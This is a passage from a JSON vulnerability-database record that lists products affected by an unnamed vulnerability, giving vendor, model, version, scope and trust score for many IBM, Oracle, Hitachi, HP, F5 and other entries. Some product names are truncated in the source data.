"vendor": "ibm",
"version": "7.1.2"
},
{
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"model": "device manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-06(x64))"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "3.5.0"
},
{
"model": "device manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "fuse esb enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7.1.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.43"
},
{
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.6.0"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.2"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.13"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "tiered storage manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0.1"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "content analytics with enterprise search",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"model": "business process manager advanced",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0"
},
{
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "1.1.0-00"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.47"
},
{
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.5"
},
{
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.6.0.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "linux enterprise software development kit sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.1.0"
},
{
"model": "big-ip edge gateway hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.1"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "secure analytics 2013.2r8",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"model": "job management partner 1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-0"
},
{
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.0-00"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.41"
},
{
"model": "content manager records enabler",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-06"
},
{
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.1.19"
},
{
"model": "openpages grc platform",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.1"
},
{
"model": "content navigator",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.1"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"model": "primavera contract management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "tuning manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.x"
},
{
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-04(x64))"
},
{
"model": "business server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "1"
},
{
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2.1"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.43"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.10"
},
{
"model": "jboss operations network",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3.2.1"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.3"
},
{
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "1.0.0-00"
},
{
"model": "content navigator",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "xp7 global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.4.0-00"
},
{
"model": "raplication manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"model": "websphere partner gateway advanced edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"model": "weblogic portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1.0"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.42"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.5-00"
},
{
"model": "tiered storage manager software",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.5.0-02"
},
{
"model": "big-ip webaccelerator hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.20"
},
{
"model": "primavera contract management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-06"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0.0-00"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-10-07"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.27"
},
{
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0.0-00"
},
{
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1.7"
},
{
"model": "websphere lombardi edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.2"
},
{
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"model": "tivoli provisioning manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.0"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.1"
},
{
"model": "tuning manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "websphere sensor events",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.1.5"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0"
},
{
"model": "security threat response manager",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2012.1"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.0.0-00"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.10"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-00"
},
{
"model": "qradar siem mr2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.4"
},
{
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1"
},
{
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"model": "filenet p8 platform content search engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"model": "tivoli identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"model": "tivoli netcool/omnibus web gui",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.4"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.35"
},
{
"model": "tuning manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"model": "tivoli composite application manager for websphere",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3"
},
{
"model": "raplication manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.001"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "qradar siem mr5",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.3"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.07"
},
{
"model": "infosphere identity insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.3"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.3"
},
{
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0"
},
{
"model": "infosphere master data management collaborative edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "-10.0"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.1-00"
},
{
"model": "qradar siem mr2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"model": "device manager software",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"model": "endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.0"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.39"
},
{
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "5.0"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"model": "predictive insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.23"
},
{
"model": "social media analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2"
},
{
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.2"
},
{
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"model": "global link manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.15"
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-03"
},
{
"model": "tivoli workload scheduler z/os connector",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"model": "application manager for smart business",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2.1"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.31"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.3.5.0"
},
{
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3"
},
{
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "device manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-08"
},
{
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-11-01"
},
{
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.3.0"
},
{
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-03(x64))"
},
{
"model": "retail back office 12.0.9in",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-00"
},
{
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.4"
},
{
"model": "real-time decision platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0"
},
{
"model": "filenet content manager content engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.2"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-10"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-07"
},
{
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"model": "network satellite server (for rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6)5.5"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.31"
},
{
"model": "filenet p8 platform content search engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.5.1"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.05"
},
{
"model": "infosphere master data management collaborative edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "-11.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.55"
},
{
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2"
},
{
"model": "tivoli foundations for application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2"
},
{
"model": "infosphere master data management server for product information",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "infosphere information server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.0"
},
{
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.5"
},
{
"model": "waveset",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1.1"
},
{
"model": "tivoli identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"model": "big-ip edge gateway hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.0"
},
{
"model": "network satellite server (for rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6)5.4"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-11"
},
{
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.24.0"
},
{
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00-11"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.4"
},
{
"model": "tuning manager software",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.402"
},
{
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-00"
},
{
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-01"
},
{
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.00"
},
{
"model": "secure analytics 2012.1r7",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-03"
},
{
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"model": "device manager software (solaris(op",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4.0-00"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.2"
},
{
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"model": "insurance ifrs analyzer",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "178.0.7"
},
{
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "56001"
},
{
"model": "financial transaction manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"model": "tivoli storage manager administration center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.11"
},
{
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"model": "secure analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2013.2"
},
{
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "websphere lombardi edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"model": "infosphere balanced warehouse c4000",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00(x64))"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.33"
},
{
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.03"
},
{
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.24"
},
{
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.5"
},
{
"model": "websphere partner gateway express edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0.3"
},
{
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"model": "terasoluna server framework for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ntt data",
"version": "2.0.51"
},
{
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3"
},
{
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.2.177"
},
{
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.45"
},
{
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.01"
},
{
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.0.0"
},
{
"model": "tuning manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.1.0"
},
{
"model": "communications metasolv solution",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2.10.0"
},
{
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "filenet p8 platform content search engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
